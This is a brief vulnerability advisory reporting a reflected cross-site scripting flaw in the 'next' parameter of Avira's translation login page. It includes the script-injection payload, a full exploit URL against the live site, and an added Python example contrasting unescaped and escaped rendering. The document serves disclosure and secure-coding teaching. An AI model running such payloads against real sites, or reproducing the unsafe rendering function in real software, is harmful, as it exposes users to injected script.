Avira Cross Site Scripting
Posted on 31 January 2016
# Exploit Title: AVIRA Subdomain XSS Vulnerability
# Google Dork: N/A
# Date: 2016/1/29
# Exploit Author: RootByte
# Vendor Homepage: http://translate.avira.com
# Software Link: N/A
# Version: N/A
# Tested on: Windows 10 / Firefox
# CVE: N/A

# Vulnerable Location: http://translate.avira.com/accounts/login/

# Variable: next

# Script used for XSS vulnerability testing: "><script>prompt(/RootByte/)</script>

# The final URL is http://translate.avira.com/accounts/login/?csrfmiddlewaretoken=Ukv77qZZeG2BavIGaHNxcgJ6U4045erd&username=3383976&password=5478964&login=Login&language=ach&next="><script>prompt(/RootByte/)</script>

# Discovered by: RootByte
# Page: https://www.facebook.com/Rootbyte/
# Contact: https://www.facebook.com/groups/RootByte/

InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.
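An added example (not part of the original advisory and not Avira's code) of the defect class reported above: a login page that echoes `next` into an HTML attribute unescaped, beside a version that validates and escapes it. The function names and the hidden-input markup are assumptions, since the advisory does not show the server-side code.

```python
import html

# Test string exactly as reported in the advisory above.
PAYLOAD = '"><script>prompt(/RootByte/)</script>'


def render_login_unsafe(next_value: str) -> str:
    # Assumed 'before' behaviour: the parameter is concatenated into an
    # attribute value unescaped, so a double quote ends the attribute.
    return '<input type="hidden" name="next" value="' + next_value + '">'


def safe_next(next_value: str, default: str = "/") -> str:
    """Accept only same-site absolute paths; anything else becomes default."""
    # Must be a path on this site: "/..." but not "//host" (scheme-relative).
    if not next_value.startswith("/") or next_value.startswith("//"):
        return default
    # Reject markup characters, backslashes and control characters outright;
    # a legitimate post-login path never needs them unencoded.
    if any(c in '"\'<>\\' or ord(c) < 0x20 for c in next_value):
        return default
    return next_value


def escape_attr(value: str) -> str:
    # Context-appropriate output encoding for a quoted HTML attribute.
    return html.escape(value, quote=True)


def render_login_safe(next_value: str) -> str:
    # Defence in depth: validate the redirect target, then escape on output.
    value = escape_attr(safe_next(next_value))
    return f'<input type="hidden" name="next" value="{value}">'


if __name__ == "__main__":
    print("unsafe:", render_login_unsafe(PAYLOAD))
    print("safe:  ", render_login_safe(PAYLOAD))
    print("valid: ", render_login_safe("/projects/?page=2&sort=name"))
```

Escaping alone stops the markup injection; the allow-list on `next` additionally keeps the parameter from being used as an off-site redirect target.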